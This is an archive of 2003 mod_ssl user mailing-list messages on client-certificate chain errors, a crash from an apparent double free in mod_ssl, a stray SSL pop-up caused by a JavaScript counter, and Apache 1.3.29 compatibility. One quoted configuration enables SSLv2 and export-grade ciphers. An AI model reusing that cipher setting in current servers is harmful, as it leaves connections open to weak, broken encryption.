From owner-modssl-users@modssl.org  Fri Oct 24 16:49:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9E937A8938; Fri, 24 Oct 2003 16:49:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lyomail.in2p3.fr (lyomail.in2p3.fr [134.158.138.12])
	by master.modssl.org (Postfix) with ESMTP id 51F27A8933
	for ; Fri, 24 Oct 2003 16:49:24 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by lyomail.in2p3.fr (Postfix) with ESMTP
	id 8FA6D24406B; Fri, 24 Oct 2003 16:49:20 +0200 (CEST)
Received: from lyomail.in2p3.fr ([127.0.0.1])
 by localhost (lyomail [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 30797-07; Fri, 24 Oct 2003 16:49:18 +0200 (CEST)
Received: from ipnl.in2p3.fr (lyopc128.in2p3.fr [134.158.139.178])
	by lyomail.in2p3.fr (Postfix) with ESMTP
	id AC12B24406E; Fri, 24 Oct 2003 16:49:13 +0200 (CEST)
Date: Fri, 24 Oct 2003 16:49:10 +0200 (CEST)
From: m.chartoire@ipnl.in2p3.fr
Subject: Re: Client authentication and Chain certs
To: modssl-users@modssl.org
In-Reply-To: <200310241423.20776.chris@katjam.co.uk>
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Message-Id: <20031024144913.AC12B24406E@lyomail.in2p3.fr>
X-Virus-Scanned: by amavisd-new at ipnl.in2p3.fr
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: m.chartoire@ipnl.in2p3.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Le 24 Oct, Chris Covell a ecrit :
> Hello there Martial,
> 
> many thanks for you quick reply.
> 
>>   We also have: root CA -> sub CA -> client or server cert
>>
>>   we have put the root and sub CA in a directory pointed by:
>>   SSLCACertificatePath
>>
> 
> In seperate files ?

 Yes each Ca is in a separate file.
> 
>>   In this directory we have the attatched Makefile that we run to make a
>>   hash of all CA and link the result of the hash to eatch CA.
>>
>>   This work fine whith apache 1.3.3x to the latest 2.4.
> 
> Did you use "SSLCertificateChainFile" in the httpd.conf ?

 No, only SSLCACertificatePath /path/to/the/directory-contening-files
> 
> Chris...
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
Martial Chartoire, Service Informatique | E-mail: m.chartoire@ipnl.in2p3.fr
Institut de Physique Nucleaire de Lyon  | phone : +33 472 448 430
43, BD du 11 Novembre 1918              | fax   : +33 472 448 004
F 69622 Villeurbanne Cedex              |
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 24 18:01:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 101CCA8938; Fri, 24 Oct 2003 18:01:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43])
	by master.modssl.org (Postfix) with ESMTP id BB693A8933
	for ; Fri, 24 Oct 2003 18:00:49 +0200 (CEST)
Received: from linux ([80.7.147.56]) by mta03-svc.ntlworld.com
          (InterMail vM.4.01.03.37 201-229-121-137-20020806) with ESMTP
          id <20031024160044.DPCY21223.mta03-svc.ntlworld.com@linux>
          for ; Fri, 24 Oct 2003 17:00:44 +0100
Content-Type: text/plain;
  charset="iso-8859-1"
From: Chris Covell 
To: modssl-users@modssl.org
Subject: Re: Client authentication and Chain certs
Date: Fri, 24 Oct 2003 17:00:07 +0000
X-Mailer: KMail [version 1.4]
References: <200310241404.06751.chris@katjam.co.uk>
In-Reply-To: <200310241404.06751.chris@katjam.co.uk>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200310241700.07647.chris@katjam.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris Covell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Many thanks to those of you who have helped me on this.

Unfortunately I still have the problem. I have also duplicated the proble=
m on=20
a completely different environment, so I think it is either me, or the=20
certificates I am using !

I have taken all of you advice and set up the web server like this:

SSLCertificateFile=09=09.../conf/ssl.crt/server.crt
SSLCertificateKeyFile=09=09.../conf/ssl.key/server.key
SSLCACertificateFile=09=09.../conf/ssl.crt/cacert.crt

SSLVerifyClient require
SSLVerifyDepth  2

where the cacert.crt file has both the sub and the root CA certificates i=
n it.

The error I am getting in the apache log is:

mod_ssl: Certificate Verification Error (24): invalid CA certificate

I have checked the certificate and chain via the openssl command:

openssl verify -CAfile cacert.crt server.crt

and this is fine.

Does anybody know where I can get a good description of the conditions th=
at=20
produce the above mod_ssl error ? I don't even know if this is a problem =
with=20
the certificates on the server, or the certificates passed by the client.

Yours hopefully,

Chris...
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 27 13:01:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6E942A8963; Mon, 27 Oct 2003 13:01:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta02-svc.ntlworld.com (mta02-svc.ntlworld.com [62.253.162.42])
	by master.modssl.org (Postfix) with ESMTP id 6E39DA893F
	for ; Mon, 27 Oct 2003 13:00:50 +0100 (CET)
Received: from linux ([80.7.148.17]) by mta02-svc.ntlworld.com
          (InterMail vM.4.01.03.37 201-229-121-137-20020806) with ESMTP
          id <20031027120042.DSJO8170.mta02-svc.ntlworld.com@linux>
          for ; Mon, 27 Oct 2003 12:00:42 +0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Chris Covell 
To: modssl-users@modssl.org
Subject: Re: Client authentication and Chain certs
Date: Mon, 27 Oct 2003 12:00:36 +0000
X-Mailer: KMail [version 1.4]
References: <200310241404.06751.chris@katjam.co.uk> <200310241700.07647.chris@katjam.co.uk>
In-Reply-To: <200310241700.07647.chris@katjam.co.uk>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200310271200.36597.chris@katjam.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris Covell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Guys, just to ley you know that I have solved the problem.

The CA cert I was using was bad (wrong extensions set). That is why=20
Apache/mod_ssl was saying that it was an invalid CA cert. Using a differe=
nt=20
CA solved my problem and I can use client certs to log on fine now !

Many thanks for your help on this.

Chris...

On Friday 24 October 2003 18:00, Chris Covell wrote:
> Many thanks to those of you who have helped me on this.
>
> Unfortunately I still have the problem. I have also duplicated the prob=
lem
> on a completely different environment, so I think it is either me, or t=
he
> certificates I am using !
>
> I have taken all of you advice and set up the web server like this:
>
> SSLCertificateFile=09=09.../conf/ssl.crt/server.crt
> SSLCertificateKeyFile=09=09.../conf/ssl.key/server.key
> SSLCACertificateFile=09=09.../conf/ssl.crt/cacert.crt
>
> SSLVerifyClient require
> SSLVerifyDepth  2
>
> where the cacert.crt file has both the sub and the root CA certificates=
 in
> it.
>
> The error I am getting in the apache log is:
>
> mod_ssl: Certificate Verification Error (24): invalid CA certificate
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 27 15:42:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 79712A8963; Mon, 27 Oct 2003 15:42:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web20509.mail.yahoo.com (web20509.mail.yahoo.com [216.136.226.144])
	by master.modssl.org (Postfix) with SMTP id 944DAA893F
	for ; Mon, 27 Oct 2003 15:41:57 +0100 (CET)
Message-ID: <20031027144133.3940.qmail@web20509.mail.yahoo.com>
Received: from [62.129.121.32] by web20509.mail.yahoo.com via HTTP; Mon, 27 Oct 2003 06:41:33 PST
Date: Mon, 27 Oct 2003 06:41:33 -0800 (PST)
From: Matt Stevenson 
Subject: Re: SIGBUS after upgrading to mod_ssl-2.8.15-1.3.28 and using +OptRenegotiate
To: modssl-users@modssl.org
In-Reply-To: <20031009202707.96507.qmail@web20505.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've been doing a little debugging under linux and
seem to have found an issue in ssl_kernel_engine.c.

On line 1001 X509_free(cert) is called. When a call to
get the cert is used later on line 1033 the memory
looks corrupt and a SEGV happens on the next line. I
removed the X509_free(cert) on line 1001 and the SEGV
stopped (am I now leaking memory?).

Is the cert being freed already by the
sk_X509_pop_free on line 999 (after being place on the
stack in previous code)?

997            if (SSL_get_peer_cert_chain(ssl) !=
certstack) {
998                /* created by us, so free it */
999                sk_X509_pop_free(certstack,
X509_free);
1000            }
1001            X509_free(cert);
        }

Any help appreciated.

Thanks
Matt

--- Matt Stevenson  wrote:
> Hi,
> 
> With the release of openssl-0.9.6k I recompiled and
> updated my apache installs to 1.3.28/modssl-2.8.15
> from 1.3.27/modssl-2.8.12. I compiled up on Linux
> and
> Solaris. When running I randomly get a SIGBUS on
> Solaris and a SIGSEGV on linux. I'm using client
> certificates. I've a large number of servers (>50)
> running fine on 1.3.27/2.8.12.
> 
> The issue seems to be with the "SSLOptions
> +OptRenegotiate" option. When going from a non
> client
> cert location to a client cert location.
> 
> The backtrace from dbx on solaris is
> 
> t@1 (l@1) signal BUS (invalid address alignment) in
> sk_value at 0xfebed534
> 0xfebed534: sk_value+0x0014:    ld      [%g3 + %g2],
> %o0
> (/opt/SUNWspro/bin/../WS6/bin/sparcv9/dbx) where
> current thread: t@1
> =>[1] sk_value(0x132990, 0x0, 0x3, 0xfed27eb0,
> 0x260,
> 0x132980), at 0xfebed534
>   [2] X509_NAME_oneline(0x132980, 0x0, 0x0, 0x0,
> 0xc7,
> 0xffbef4d0), at 0xfec1e6dc
>   [3] ssl_hook_Access(0xf0f30, 0xfed64cf4, 0xad400,
> 0x24bec, 0x0, 0xf26b8), at 0xfed65b74
>   [4] run_method(0xf0f30, 0x10, 0x1, 0x0, 0x0,
> 0xff00), at 0x2052c
>   [5] ap_check_access(0xf0f30, 0x93460, 0x93400,
> 0x91659, 0x45, 0x65), at 0x20620
>   [6] process_request_internal(0xf0f30, 0x0, 0x16,
> 0xcd, 0xeffffc00, 0x1), at 0x40180
>   [7] ap_process_request(0xf0f30, 0xc8, 0xf0f30,
> 0xffbef8e0, 0xffbef8f0, 0x5), at 0x405ac
>   [8] child_main(0x5, 0x31298, 0x31000, 0xff17b250,
> 0xff175980, 0xff16efe0), at 0x33284
>   [9] make_child(0xb0bf0, 0x5, 0x3f8154e3, 0xcd,
> 0xff23b1d4, 0xffbefa18), at 0x335fc
>   [10] perform_idle_server_maintenance(0x0,
> 0xffbefb1c, 0x0, 0xb0bf0, 0x90ed8, 0x8fa80), at
> 0x33b10
>   [11] standalone_main(0x6, 0xffbefc4c, 0x0, 0x0,
> 0xff23b02c, 0x90ff0), at 0x34384
>   [12] main(0x6, 0xffbefc4c, 0xffbefc68, 0xadd98,
> 0x0,
> 0x0), at 0x34cc4
> 
> the cofiguration for a typical SSL server is ...
> 
> SSLEngine on
> SSLCipherSuite
>
ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
> SSLCertificateFile
> /opt/apache_test/conf/ssl.crt/server.crt
> SSLCertificateKeyFile
> /opt/apache_test/conf/ssl.key/server.key
> SSLCACertificateFile
> /opt/apache_test/conf/ssl.crt/CA.crt
> SSLVerifyDepth  2
> SSLOptions +StdEnvVars +ExportCertData
> 
> SSLPassPhraseDialog  builtin
> SSLSessionCache       
>
shmcb:/opt/apache_test/sites/debug.internal.net/logs/ssl_scache(512000)
> SSLSessionCacheTimeout  300
> SSLMutex 
>
file:/opt/apache_test/sites/debug.internal.net/logs/ssl_mutex
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLLog
>
/opt/apache_test/sites/debug.internal.net/logs/ssl_engine_log
> SSLLogLevel Warn
> 
> 
>  SSLVerifyClient optional
>  SSLOptions +OptRenegotiate
> 
> 
> When entering the images directory some but not all
> of
> the httpd children die. I'm going to get a linux
> debug
> server running. Hopefully someone can replicate the
> issue? Or suggest a fix.
> 
> Thanks
> Matt
> 
> 
> __________________________________
> Do you Yahoo!?
> The New Yahoo! Shopping - with improved product
> search
> http://shopping.yahoo.com
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

__________________________________
Do you Yahoo!?
Exclusive Video Premiere - Britney Spears
http://launch.yahoo.com/promos/britneyspears/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 27 19:49:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 47380A8963; Mon, 27 Oct 2003 19:49:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id D90C0A893F
	for ; Mon, 27 Oct 2003 19:49:01 +0100 (CET)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2003031900) with ESMTP id h9RImuEG008466;
	Mon, 27 Oct 2003 13:48:56 -0500 (EST)
Date: Mon, 27 Oct 2003 13:48:56 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Matt Stevenson 
Cc: modssl-users@modssl.org
Subject: Re: SIGBUS after upgrading to mod_ssl-2.8.15-1.3.28 and ...
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


This message bounced back to me with some error about invalid characters
in the subject line, so I chopped out the +OptRenegotiate part...
hopefully this will work now.  :)

---------- Forwarded message ----------
Date: Mon, 27 Oct 2003 13:41:41 -0500 (EST)
From: Cliff Woolley 
To: Matt Stevenson 
Cc: modssl-users@modssl.org
Subject: Re: SIGBUS after upgrading to mod_ssl-2.8.15-1.3.28 and using
    +OptRenegotiate

On Mon, 27 Oct 2003, Matt Stevenson wrote:

> Is the cert being freed already by the
> sk_X509_pop_free on line 999 (after being place on the
> stack in previous code)?
>
> 997            if (SSL_get_peer_cert_chain(ssl) !=
> certstack) {
> 998                /* created by us, so free it */
> 999                sk_X509_pop_free(certstack,
> X509_free);
> 1000            }
> 1001            X509_free(cert);
>         }

I'd have to look more carefully at your version of mod_ssl, but the
mod_ssl for Apache 2.x doesn't have that extra X509_free() call at line
1001, so I would guess that removing it might indeed be a correct change.

You can see where the corresponding lines were added to mod_ssl for Apache
2.x here:

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_kernel.c.diff?r1=1.72&r2=1.73

The log message that went along with that commit was:

   'SSLOptions +OptRengotiate' will use client cert in from the ssl
   session cache when there is no cert chain in the cache.  prior to
   the fix this situation would result in a FORBIDDEN response and
   error message "Cannot find peer certificate chain"

Hope this helps,
Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 28 05:54:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EFD0DA8963; Tue, 28 Oct 2003 05:54:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v003.vaio.ne.jp (v003.vaio.ne.jp [210.153.70.146])
	by master.modssl.org (Postfix) with ESMTP id DFDF0A8933
	for ; Tue, 28 Oct 2003 05:54:08 +0100 (CET)
Received: from [127.0.0.1] by v003.vaio.ne.jp (3.7W/vaio030909) with ESMTP
	id h9S4s1mg012212 for ; Tue, 28 Oct 2003 13:54:02 +0900 (JST)
	(envelope-from kuri3@v003.vaio.ne.jp)
Date: Tue, 28 Oct 2003 13:54:05 +0900
From: "Takeshi Kuriyama" 
To: modssl-users@modssl.org
Subject: Non SSL requires a certificate acceptance
Message-Id: <20031028135346.8696.KURI3@v003.vaio.ne.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.07.02
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Takeshi Kuriyama" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I'm running some name-based vhosts and one of them is a self-signed ssl
vhost under:
	apache-1.3.27-13
	openssl-0.9.6k-2
	mod_ssl-2.8.14-13.
My apache configure is like this:
	Port 80
	
		Listen 80
		Listen 443
	
	ServerName domainA
	DocumentRoot "/dummy/doc/root"
	NameVirtualHost *
	
		ServerName domainA
		DocumentRoot /domainA/doc/root
	
	
		ServerName domainB
		DocumentRoot /domainB/doc/root
	
	
		ServerName domainC
		DocumentRoot /domainC/doc/root
	
	
		ServerName domainA
		DocumentRoot /ssl-domainA/doc/root
		SSLEngine on
	

The trouble is:
When I connect a non-SSL domainC(http://domainC/) , I get a pop-up warning
which says certificate is self generated, and I can't see any secret
icon on the brouser when I accept or not. And more confusing, any
another non-SSL domains(A and B) don't! A both-domain(domainA) goes good
non-ssl and ssl.

I walked around some archives and googles but could not find any answers.
Anybody met this problem? 
I would really appreciate any help or suggestion.

Thanks,
Takeshi

kuri3@v003.vaio.ne.jp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 28 11:36:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1EC1AA8963; Tue, 28 Oct 2003 11:36:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v003.vaio.ne.jp (v003.vaio.ne.jp [210.153.70.146])
	by master.modssl.org (Postfix) with ESMTP id 81BADA8933
	for ; Tue, 28 Oct 2003 11:35:44 +0100 (CET)
Received: from [127.0.0.1] by v003.vaio.ne.jp (3.7W/vaio030909) with ESMTP
	id h9SAZWmg006353 for ; Tue, 28 Oct 2003 19:35:33 +0900 (JST)
	(envelope-from kuri3@v003.vaio.ne.jp)
Date: Tue, 28 Oct 2003 19:35:36 +0900
From: "Takeshi Kuriyama" 
To: modssl-users@modssl.org
Subject: Re: Non SSL requires a certificate acceptance
In-Reply-To: <20031028135346.8696.KURI3@v003.vaio.ne.jp>
References: <20031028135346.8696.KURI3@v003.vaio.ne.jp>
Message-Id: <20031028192658.EB4E.KURI3@v003.vaio.ne.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.07.02
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Takeshi Kuriyama" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Everything is settled.
A reason is that a tiny Javascript in domainC index.html goes to a SSl
host every time accessed.

Thanks,
Takeshi

kuri3@v003.vaio.ne.jp


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 06:58:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 566A1A89E6; Wed, 29 Oct 2003 06:58:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from snoopy.pacific.net.au (snoopy.pacific.net.au [61.8.0.36])
	by master.modssl.org (Postfix) with ESMTP id 695B3A893A
	for ; Wed, 29 Oct 2003 06:58:14 +0100 (CET)
Received: from mongrel.pacific.net.au (mongrel.pacific.net.au [61.8.0.107])
	by snoopy.pacific.net.au (8.12.3/8.12.3/Debian-6.6) with ESMTP id h9T5vrV0015116
	for ; Wed, 29 Oct 2003 16:57:53 +1100
Received: from nt001.froggy.com.au (ppp180.adsl89.pacific.net.au [202.7.89.180])
	by mongrel.pacific.net.au (8.12.3/8.12.3/Debian-6.6) with ESMTP id h9T5vbDM004105
	for ; Wed, 29 Oct 2003 16:57:39 +1100
Message-Id: <6.0.0.22.0.20031029165650.023bd630@mail.froggy.com.au>
X-Sender: peterabrown@mail.froggy.com.au
X-Mailer: QUALCOMM Windows Eudora Version 6.0.0.22
Date: Wed, 29 Oct 2003 16:57:51 +1100
To: modssl-users@modssl.org
From: Peter Brown 
Subject: Re: Non SSL requires a certificate acceptance
In-Reply-To: <20031028192658.EB4E.KURI3@v003.vaio.ne.jp>
References: <20031028135346.8696.KURI3@v003.vaio.ne.jp>
 <20031028192658.EB4E.KURI3@v003.vaio.ne.jp>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Brown 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Takeshi,

Can you share with us how you stopped the warning message - presumably in IE?

Peter'

At 19:35 28/10/03 +0900, you wrote:
>Everything is settled.
>A reason is that a tiny Javascript in domainC index.html goes to a SSl
>host every time accessed.
>
>Thanks,
>Takeshi
>
>kuri3@v003.vaio.ne.jp
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 11:00:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D2616A89E6; Wed, 29 Oct 2003 11:00:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v003.vaio.ne.jp (v003.vaio.ne.jp [210.153.70.146])
	by master.modssl.org (Postfix) with ESMTP id 29559A893A
	for ; Wed, 29 Oct 2003 11:00:22 +0100 (CET)
Received: from [127.0.0.1] by v003.vaio.ne.jp (3.7W/vaio030909) with ESMTP
	id h9TA0Dmg017550 for ; Wed, 29 Oct 2003 19:00:15 +0900 (JST)
	(envelope-from kuri3@v003.vaio.ne.jp)
Date: Wed, 29 Oct 2003 19:00:19 +0900
From: "Takeshi Kuriyama" 
To: modssl-users@modssl.org
Subject: Re: Non SSL requires a certificate acceptance
In-Reply-To: <6.0.0.22.0.20031029165650.023bd630@mail.froggy.com.au>
References: <20031028192658.EB4E.KURI3@v003.vaio.ne.jp> <6.0.0.22.0.20031029165650.023bd630@mail.froggy.com.au>
Message-Id: <20031029183501.E1FF.KURI3@v003.vaio.ne.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.07.02
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Takeshi Kuriyama" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

That's all my mistake.
I've gorgotten that an index.html in non-ssl contains a javascript that
accesses to an ssl-url for counting access log. I gave up ssl communication.
All I do is changing a logging tool into non-ssl  'cause luckily a
logging tool is running also on server.
So, IE or Opera isn't the matter. Neither mod_ssl nor apache
configuration. Sorry I easily posted into ML.

Thanks,
Takeshi

kuri3@v003.vaio.ne.jp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 15:23:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8918DA89E6; Wed, 29 Oct 2003 15:23:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ointment.org (pozzo.ointment.org [66.92.130.200])
	by master.modssl.org (Postfix) with SMTP id 1F3C2A893A
	for ; Wed, 29 Oct 2003 15:23:40 +0100 (CET)
Received: (qmail 17125 invoked by uid 500); 29 Oct 2003 14:23:34 -0000
Date: Wed, 29 Oct 2003 08:23:34 -0600
From: Peter Horst 
To: modssl-users@modssl.org
Subject: apache 1.3.29?
Message-ID: <20031029142334.GJ4006@ointment.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.3i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Horst 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just noticed that apache 1.3.29 was released. Will mod_ssl-2.8.15 work
with this? I'm using openssl-0.9.7c. 

Thanks much.

Peter

-- 
What do you use on Linux to do your word processing? spreadsheets? slide
shows? Do you feel that ms-dos and ms-dos-office is really a better
mouse trap and worth the price? We certainly differ on this point I
think, because I believe Linux is definitely good enough for the average
user, most of whom are idiots.
 -- Alan DuBoff, linux-elitists mailing list, 12/31/02
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 15:40:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DBC90A89E6; Wed, 29 Oct 2003 15:40:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from devsys.jaguNET.com (devsys.jaguNET.com [209.133.192.6])
	by master.modssl.org (Postfix) with ESMTP id 35509A893A
	for ; Wed, 29 Oct 2003 15:39:44 +0100 (CET)
Received: (from jim@localhost)
	by devsys.jaguNET.com (8.11.7a/jag-2.6) id h9TEdd309679
	for modssl-users@modssl.org; Wed, 29 Oct 2003 09:39:39 -0500 (EST)
From: Jim Jagielski 
Message-Id: <200310291439.h9TEdd309679@devsys.jaguNET.com>
Subject: Re: apache 1.3.29?
To: modssl-users@modssl.org
Date: Wed, 29 Oct 2003 09:39:31 -0500 (EST)
In-Reply-To: <20031029142334.GJ4006@ointment.org> from "Peter Horst" at Oct 29, 2003 08:23:34 AM
X-Mailer: ELM [version 2.5 PL5]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jim Jagielski 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes it will, but the patch will not apply "cleanly". Using --force
is recommended.

Peter Horst wrote:
> 
> Just noticed that apache 1.3.29 was released. Will mod_ssl-2.8.15 work
> with this? I'm using openssl-0.9.7c. 
> 
> Thanks much.
> 
> Peter
> 
> -- 
> What do you use on Linux to do your word processing? spreadsheets? slide
> shows? Do you feel that ms-dos and ms-dos-office is really a better
> mouse trap and worth the price? We certainly differ on this point I
> think, because I believe Linux is definitely good enough for the average
> user, most of whom are idiots.
>  -- Alan DuBoff, linux-elitists mailing list, 12/31/02
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


-- 
===========================================================================
   Jim Jagielski   [|]   jim@jaguNET.com   [|]   http://www.jaguNET.com/
